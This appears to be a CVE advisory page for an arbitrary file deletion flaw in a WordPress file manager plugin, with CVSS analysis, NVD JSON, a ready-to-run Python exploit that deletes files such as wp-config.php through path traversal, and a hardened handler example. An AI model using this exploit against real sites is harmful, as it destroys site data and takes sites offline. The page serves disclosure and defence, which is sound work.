Security Vulnerability Report
CVE-2025-14804 CVSS 7.7 HIGH

CVE-2025-14804

Published: 2026-01-07 12:16:57
Last Modified: 2026-04-15 00:35:42

Description

The Frontend File Manager Plugin WordPress plugin before 23.5 did not validate the path parameter or check ownership of the file, allowing any authenticated user, such as a subscriber, to delete arbitrary files on the server.

CVSS Details

CVSS Score
7.7
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:H/A:N
Reading the vector: reachable over the network with low attack complexity, requires only a low-privilege account (PR:L, i.e. any subscriber) and no user interaction. Scope is changed because the deletion reaches files beyond the plugin's own upload area. Only integrity is scored (I:H); confidentiality and availability are scored as no impact, although deleting a file such as wp-config.php would in practice take the site down.

Configurations (Affected Products)

No CPE configuration data is available in the NVD record (vulnStatus: Deferred). Affected versions, per the description:

Frontend File Manager Plugin < 23.5 (fixed in 23.5)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests
import sys

# CVE-2025-14804 PoC - Arbitrary File Deletion in Frontend File Manager Plugin
# Requires an authenticated user (subscriber role or higher)

TARGET_URL = "http://target-wordpress-site.com"
USERNAME = "attacker"
PASSWORD = "password"


def get_auth_cookie():
    """Authenticate against wp-login.php and return the WordPress session cookies"""
    login_url = f"{TARGET_URL}/wp-login.php"
    session = requests.Session()
    login_data = {
        'log': USERNAME,
        'pwd': PASSWORD,
        'wp-submit': 'Log In',
        'redirect_to': '/wp-admin/',
        'testcookie': '1'
    }
    response = session.post(login_url, data=login_data, allow_redirects=False)
    # A successful login sets a wordpress_logged_in_* cookie and redirects (302);
    # a failed login re-renders the form with a 200
    if 'wordpress_logged_in' in str(session.cookies) or response.status_code == 302:
        return session.cookies
    return None


def delete_arbitrary_file(cookies, file_path):
    """Send the file deletion request with a path traversal payload"""
    delete_url = f"{TARGET_URL}/wp-admin/admin-ajax.php"
    # Vulnerable versions pass the path parameter through unvalidated, so a
    # relative traversal string reaches files outside the plugin's directory.
    # The advisory text does not name the AJAX action; 'fmfm_delete_file' is
    # the action this PoC targets.
    payload = {
        'action': 'fmfm_delete_file',
        'path': file_path
    }
    headers = {
        'X-Requested-With': 'XMLHttpRequest'
    }
    response = requests.post(delete_url, data=payload, cookies=cookies, headers=headers)
    return response


def main():
    if len(sys.argv) < 2:
        print("Usage: python cve-2025-14804-poc.py <file_to_delete>")
        print("Example: python cve-2025-14804-poc.py ../../../wp-config.php")
        sys.exit(1)

    target_file = sys.argv[1]

    print(f"[*] Authenticating as {USERNAME}...")
    cookies = get_auth_cookie()
    if not cookies:
        print("[-] Authentication failed!")
        sys.exit(1)
    print("[+] Authentication successful!")

    print(f"[*] Attempting to delete: {target_file}")
    response = delete_arbitrary_file(cookies, target_file)
    if response.status_code == 200:
        print("[+] File deletion request sent successfully")
        print(f"[*] Response: {response.text}")
    else:
        print(f"[-] Request failed with status code: {response.status_code}")


if __name__ == "__main__":
    main()
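The two checks the description says were missing, path validation and file ownership, shown together in a hardened delete handler. This is an added, stand-alone Python example written for this page, not code from the Frontend File Manager plugin (whose real handler is PHP and is not reproduced here); the upload directory layout, the ownership map and the file names are constructed for the demonstration. The function names resolve_within and delete_user_file are hypothetical.

```python
import os
import shutil
import tempfile
from pathlib import Path


class FileDeleteError(Exception):
    """Raised when a delete request fails validation."""


def resolve_within(base_dir: Path, requested: str) -> Path:
    """Canonicalise `requested` relative to `base_dir` and refuse anything that escapes it.

    Path.resolve() follows symlinks and collapses '..' segments, so a traversal
    payload such as '../../wp-config.php' (or a symlink pointing outside the
    managed directory) resolves to a location outside base_dir and fails the
    containment check below.
    """
    base = base_dir.resolve()
    # An absolute path is treated like a traversal attempt: the handler should
    # only ever see paths relative to the directory it manages.
    if os.path.isabs(requested):
        raise FileDeleteError(f"absolute path rejected: {requested!r}")
    target = (base / requested).resolve()
    if target != base and base not in target.parents:
        raise FileDeleteError(f"path escapes managed directory: {requested!r}")
    return target


def delete_user_file(base_dir: Path, owners: dict, user_id: int, requested: str) -> Path:
    """Delete a file on behalf of `user_id`, enforcing both missing checks:
    1. the path must stay inside the managed directory (no traversal), and
    2. the caller must own the file according to the ownership record.

    `owners` is a constructed stand-in for the plugin's ownership metadata,
    keyed on the canonical relative path so that a different spelling of the
    same file (e.g. via '..' or a symlink) cannot bypass the lookup.
    """
    target = resolve_within(base_dir, requested)
    rel = target.relative_to(base_dir.resolve()).as_posix()
    if owners.get(rel) != user_id:
        raise FileDeleteError(f"user {user_id} does not own {rel!r}")
    if not target.is_file():
        raise FileDeleteError(f"not a regular file: {rel!r}")
    target.unlink()
    return target


def demo() -> dict:
    """Build a throwaway tree and replay the PoC's attack paths against the hardened handler."""
    root = Path(tempfile.mkdtemp())
    try:
        uploads = root / "uploads" / "frontend-file-manager"
        uploads.mkdir(parents=True)
        (uploads / "alice.txt").write_text("alice's upload")
        (uploads / "bob.txt").write_text("bob's upload")
        # Constructed stand-in for the real config file two levels up
        (root / "wp-config.php").write_text("<?php // constructed stand-in")
        owners = {"alice.txt": 1, "bob.txt": 2}  # user id 1 = alice, 2 = bob

        attempts = [
            ("traversal", 1, "../../wp-config.php"),          # PoC-style payload
            ("absolute", 1, str(root / "wp-config.php")),     # absolute path variant
            ("other_users_file", 1, "bob.txt"),               # in-directory, wrong owner
            ("own_file", 1, "alice.txt"),                     # the only legitimate request
        ]
        results = {}
        for label, user, req in attempts:
            try:
                delete_user_file(uploads, owners, user, req)
                results[label] = "deleted"
            except FileDeleteError as exc:
                results[label] = f"rejected: {exc}"
        results["wp_config_survives"] = (root / "wp-config.php").exists()
        results["bob_survives"] = (uploads / "bob.txt").exists()
        results["alice_gone"] = not (uploads / "alice.txt").exists()
        return results
    finally:
        shutil.rmtree(root, ignore_errors=True)


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The order matters: canonicalise first, then compare against the canonical base, then look ownership up by the canonical relative name. Checking ownership on the raw user-supplied string would let "../../wp-config.php" and "./x/../../../wp-config.php" slip through as different keys. In a real WordPress handler this logic sits behind the usual front-door checks (a nonce and a capability check) rather than replacing them.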

References

https://wpscan.com/vulnerability/c572c0ad-1b36-49ce-b254-2181e53abb46/ (WPScan advisory; the only reference listed in the NVD record)

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-14804",
    "sourceIdentifier": "[email protected]",
    "published": "2026-01-07T12:16:56.620",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The Frontend File Manager Plugin WordPress plugin before 23.5 did not validate a path parameter and ownership of the file, allowing any authenticated users, such as subscribers to delete arbitrary files on the server"
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:H/A:N",
            "baseScore": 7.7,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "CHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "HIGH",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.1,
          "impactScore": 4.0
        }
      ]
    },
    "references": [
      {
        "url": "https://wpscan.com/vulnerability/c572c0ad-1b36-49ce-b254-2181e53abb46/",
        "source": "[email protected]"
      },
      {
        "url": "https://wpscan.com/vulnerability/c572c0ad-1b36-49ce-b254-2181e53abb46/",
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"
      }
    ]
  }
}